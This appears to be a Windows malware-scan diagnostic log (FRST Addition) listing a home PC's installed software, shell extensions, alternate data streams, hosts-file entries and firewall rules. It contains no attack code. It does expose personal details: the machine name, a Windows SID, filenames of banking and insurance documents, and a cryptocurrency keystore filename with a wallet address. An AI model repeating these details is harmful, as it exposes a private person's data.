Mozilla Firefox 84.0.2 (x64 cs) (HKLM\...\Mozilla Firefox 84.0.2 (x64 cs)) (Version: 84.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 55.0.1 - Mozilla)
Mp3tag v2.97 (HKLM-x32\...\Mp3tag) (Version: 2.97 - Florian Heidenreich)
Narzędzia sprawdzające pakietu Microsoft Office 2016 — polski (HKLM\...\{90160000-001F-0415-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje kontroly pravopisu pro Microsoft Office 2016 – čeština (HKLM\...\{90160000-001F-0405-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje korektúry balíka Microsoft Office 2016 - slovenčina (HKLM\...\{90160000-001F-041B-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Orodja za preverjanje za Microsoft Office 2016 – angleščina (HKLM\...\{90160000-001F-0424-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Outils de vérification linguistique 2016 de Microsoft Office - Français (HKLM\...\{90160000-001F-040C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
PrivaZer (HKLM-x32\...\PrivaZer) (Version: 4.0.17.0 - Goversoft LLC)
Rainmeter (HKLM-x32\...\Rainmeter) (Version: 4.3.1 r3321 - Rainmeter)
Revisores de Texto do Microsoft Office 2016 – Português (Brasil) (HKLM\...\{90160000-001F-0416-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
RoboForex - MetaTrader 4 (HKLM-x32\...\RoboForex - MetaTrader 4) (Version: 4.00 - MetaQuotes Software Corp.)
Strumenti di correzione di Microsoft Office 2016 - Italiano (HKLM\...\{90160000-001F-0410-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Subtitle Edit 3.5.18 (HKLM\...\SubtitleEdit_is1) (Version: 3.5.18.1 - Nikse)
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1254 - SUPERAntiSpyware.com)
Taalprogramma's voor Microsoft Office 2016 - Nederlands (HKLM\...\{90160000-001F-0413-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.2.2756 - TeamViewer)
Telegram Desktop version 2.5.1 (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1) (Version: 2.5.1 - Telegram FZ-LLC)
Total Commander 64+32-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 9.21a - Ghisler Software GmbH)
Tweetz Desktop verze 0.11.0 (HKLM-x32\...\{FE1B7E2D-6E96-4D39-B39F-62CA62D11A79}_is1) (Version: 0.11.0 - Mike Ward)
Uirlisí Profála Microsoft Office 2016 - Gaeilge (HKLM\...\{90160000-001F-083C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Ulož.to FileManager 2.82 (64-bit) (HKLM\...\3f2e2cd28b0e4e4396c2402fbc85a0f0_is1) (Version: 2.82 - Uloz.to cloud a.s.)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{F814D094-197F-43C8-87FA-3210BB780486}) (Version: 2.53.0.0 - Microsoft Corporation)
Veglat e kontrollit gjuhësor të Microsoft Office 2016 - shqip (HKLM\...\{90160000-001F-041C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
VLC media player (HKLM\...\VLC media player) (Version: 3.0.8 - VideoLAN)
Web Launch Recorder (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\WebLaunchRecorder) (Version: 2.0 - )
Εργαλεία γλωσσικού ελέγχου του Microsoft Office 2016 - Ελληνικά (HKLM\...\{90160000-001F-0408-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Засоби перевірки правопису Microsoft Office 2016 – українська (HKLM\...\{90160000-001F-0422-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Средства проверки правописания Microsoft Office 2016 — русский (HKLM\...\{90160000-001F-0419-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
כלי ההגהה של Microsoft Office 2016 - עברית (HKLM\...\{90160000-001F-040D-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
ابزارهای تصحیح Microsoft Office 2016 - فارسی (HKLM\...\{90160000-001F-0429-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden

Packages:
=========
Deezer Music -> C:\Program Files\WindowsApps\Deezer.62021768415AF_4.32.0.0_x86__q7m17pa7q8kj0 [2021-01-19] (Deezer SA)
Easy WOL (Wake on LAN) -> C:\Program Files\WindowsApps\1460ArunasAdomaitis.EasyWOLWakeonLAN_1.1.1.0_x64__fzh5k4x0zh00p [2019-05-21] (Arunas Adomaitis)
Facebook -> C:\Program Files\WindowsApps\Facebook.Facebook_186.2619.19263.0_x86__8xx8rvfyw5nnt [2019-10-10] (Facebook Inc)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-02-03] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-02-03] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.9.1102.0_x64__8wekyb3d8bbwe [2021-01-13] (Microsoft Studios) [MS Ad]
Microsoft To Do -> C:\Program Files\WindowsApps\Microsoft.Todos_2.36.4182.0_x64__8wekyb3d8bbwe [2021-01-19] (Microsoft Corporation) [Startup Task]
Minecraft for Windows 10 -> C:\Program Files\WindowsApps\Microsoft.MinecraftUWP_1.16.20102.0_x64__8wekyb3d8bbwe [2020-12-16] (Microsoft Studios)
Samsung Printer Experience -> C:\Program Files\WindowsApps\SAMSUNGELECTRONICSCO.LTD.SamsungPrinterExperience_1.3.15.0_x64__3c1yjt4zspk6g [2017-02-03] (Samsung Electronics Co. Ltd.)
Twitter -> C:\Program Files\WindowsApps\9E2F88E3.Twitter_6.1.4.1000_neutral__wgeqdkkx372wm [2018-09-08] (Twitter Inc.)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers1: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers1: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers2: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers2: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers3: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers4: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers4: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\WINDOWS\system32\igfxpph.dll [2012-11-26] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )

==================== Codecs (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Drivers32: [vidc.ffds] => C:\Windows\SysWOW64\ff_vfw.dll [7680 2009-12-17] () [File not signed]

==================== Shortcuts & WMI ========================

==================== Loaded Modules (Whitelisted) =============

2019-10-12 11:29 - 2016-07-21 09:54 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSCreateVC.dll
2019-10-12 11:29 - 2016-10-08 16:03 - 001506304 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\DAQExp.dll
2019-02-28 17:03 - 2019-02-28 17:03 - 000424448 _____ (Florian Heidenreich) [File not signed] C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll
2017-01-30 09:21 - 2016-10-04 15:51 - 000076800 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2019-10-12 11:29 - 2016-10-08 16:04 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSProducstInfo.dll

==================== Alternate Data Streams (Whitelisted) ========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:0888F409 [284]
AlternateDataStreams: C:\ProgramData\TEMP:3440EB47 [143]
AlternateDataStreams: C:\ProgramData\TEMP:66633281 [159]
AlternateDataStreams: C:\ProgramData\TEMP:93433455 [820]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20171231_D_007_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20190831_K_008_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\102394978_1.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2018-03-12 12_24_15-Historie transakcí _ SERVIS 24.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2568bee2-7540-4a15-b62b-abf4c8ec8122.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\61cd06ea-2cc3-448b-9ead-882a3b596714.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\avidemux_2.7.1_win32.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\ChromeSetup.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\cpg15x:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\creditNote_1900000049.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\desktop (New).ini:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\e8318c29-e1d9-482a-b440-976b38e0cf1e.tmp:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce (1).PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura mining 2.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura12. 9. 2018.pdf:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktuta mining 001.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\IMG_20180407_084256.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\index.php:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\invoice_180105480.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\JDownloader:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\jollycoin-node-1.0.tar.xz:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\kalendar_2018_str_2_p000000.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Kalendář-2018-1.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\KMS_2038 & Digital & Online Activation Suite v8.4:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio2.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Malwarebytes Anti-Malware 3.6.1.2711.rar:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18 (1).jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003 (1).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\PA2018040002.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\payeer_mastercard_en.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc (1.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Plná moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\priloha1.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\readme.txt:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Recepty_pro_horkovzdušnou_fritézu_R-286__CZ__11.11.2016.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\reklamacni_list.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Reklamacny-formular-vasmobil.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Shhq5QS4WNM18Ap85GVYjpNctzp3LRFeZP.json:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 14. 7. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 26. 6. 2018 (2).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Spořitelna.png:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TeamViewerQS.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Telegram Desktop:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TH_20180601-20180623.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TRUSTED_TunePat_Netflix_Video_keygen:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Ulozto:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\UTC--2017-11-14T18-20-12.713Z--984d522fcd4684d49e0d08715da5c20cba86eceb:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vypis z klientskeho uctu za obdobi 1802.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vypoved-pojistne-smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (1).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (2).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vzor_vypovedi_pojistne_smlouvy.docx:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\wordpress:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Zadost 26. 6. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\__MACOSX:com.dropbox.attrs [54]

==================== Safe Mode (Whitelisted) ==================

==================== Association (Whitelisted) =================

==================== Internet Explorer (Whitelisted) ==========

BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: WebTransBHO Class -> {2DB66063-BB98-466A-AA0D-3E7ACF5ED853} -> C:\TRANSLAT\Translator_2016.03\WebIE.dll [2019-01-28] () [File not signed]
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\ssv.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\jp2ssv.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
Toolbar: HKLM-x32 - WebTranslator - {BFC32E1D-EE75-4A48-BC60-104E11EE2431} - C:\TRANSLAT\Translator_2016.03\WebIE.dll [2019-01-28] () [File not signed]
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2016-07-16 12:47 - 2020-03-06 18:30 - 000001029 ____R C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 www.langsoft.cz
127.0.0.1 www.pctranslator.cz
177.9.78.49 ww1.moondoge.co.in
177.9.78.49 ww1.moonbit.co.in

2019-11-30 16:39 - 2019-11-30 16:44 - 000000439 _____ C:\WINDOWS\system32\drivers\etc\hosts.ics

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img13.jpg
DNS Servers: 192.168.0.1 - 1.1.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

HKLM\...\StartupApproved\Run32: => "Dropbox"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\StartupFolder: => "Poslat do aplikace OneNote.lnk"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\StartupFolder: => "IQTray.lnk"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\Run: => "Microsoft Software Essentials"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [UDP Query User{4CF5DFC9-9461-49D6-950C-BB62564F6244}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [TCP Query User{CD7B74D8-A37B-4004-84B4-A34E0A3D68ED}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [UDP Query User{BC12CC3D-9EB7-430F-A11E-D240044FD1A6}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [TCP Query User{E1BC68F1-347B-4940-8A33-5D907DBCDA84}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [UDP Query User{29287B3F-2A2F-4C57-A399-98061B1E6F2B}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [TCP Query User{7E06897A-6AF1-466E-9D68-134E4975B2C8}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [{793400D7-7C54-425B-9BD7-60F988299959}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{D34719B9-E1F9-42F6-BA3A-AA6AF2D45F2E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{2F9D3059-4454-4A07-BEE5-D6684A9BC8B9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{033BC72C-1DEC-4D1D-87CB-14942A26DDDB}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [UDP Query User{25003063-5796-4BA7-9F27-DF50B557D31D}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [TCP Query User{E8D4CD91-1165-4346-8883-1D96257E6F52}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [{ADECB0C0-D817-4AFC-AB5F-3E7FDA043DFE}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{CC710CB0-69B1-4D2B-9AAE-B86204635A9F}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{DE047D0E-57E7-42E5-852F-33C6129D3B85}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [UDP Query User{0AAFD932-9B41-400A-B798-B7F6A5298120}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [TCP Query User{0FFA7186-061D-43D7-922F-73C9FE27F461}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [UDP Query User{D7909A0E-59A3-44AA-AD21-357E7A504E90}C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe] => (Allow) C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe (Appwork GmbH -> AppWork GmbH)
FirewallRules: [TCP Query User{60724E25-F8FD-44AA-9BC9-A2ADC8EC3C89}C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe] => (Allow) C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe (Appwork GmbH -> AppWork GmbH)
FirewallRules: [{C9001568-7E61-4092-92AC-A2A34F885F7B}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{4E0915DD-85DC-4816-9616-A952C0C0C79C}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{1AB3D34D-2096-4639-A6F4-DB0021276C1B}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{8A8D7038-61CD-44CF-88BD-3B4A6221113F}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{6E0C9F16-EE9A-44B8-9451-7D5FB88A5D9D}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{EB36692E-B7B2-42BD-BC9B-B5B9C427A112}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
